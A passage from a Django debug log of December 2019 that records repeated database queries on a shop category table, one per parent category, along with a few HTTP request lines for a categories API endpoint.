"shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:57:56,467 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:57:56,472 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:57:56,479 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:57:56,484 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:57:56,488 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:57:56,493 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:57:56,497 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:57:56,501 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:57:56,507 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:57:56,510 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:57:56,514 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:57:56,518 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:57:56,522 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:57:56,528 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:57:56,532 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:57:56,535 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:57:56,539 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:57:56,545 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:57:56,551 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:57:56,555 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:57:56,559 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:57:56,563 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:57:56,567 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:57:56,571 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:57:56,576 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:57:56,580 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:57:56,584 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:57:56,589 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:57:56,593 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:57:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 07:58:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 08:03:58,131 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 08:03:58,140 utils 4252 140031732287232 (0.011) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 08:03:58,144 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 08:03:58,144 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 08:03:58,149 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 08:03:58,153 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [20/Dec/2019 08:03:58] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-20 08:03:58,159 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 08:03:58,161 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 08:03:58,164 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 08:03:58,167 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 08:03:58,171 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 08:03:58,174 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 08:03:58,176 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 08:03:58,178 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 08:03:58,181 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 08:03:58,185 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 08:03:58,190 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 08:03:58,193 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 08:03:58,195 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 08:03:58,198 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 08:03:58,201 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 08:03:58,206 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 08:03:58,208 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 08:03:58,211 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 08:03:58,214 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 08:03:58,217 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 08:03:58,219 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 08:03:58,224 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 08:03:58,226 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 08:03:58,229 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 08:03:58,232 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 08:03:58,235 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 08:03:58,239 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 08:03:58,243 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 08:03:58,247 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 08:03:58,251 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 08:03:58,254 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 08:03:58,258 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 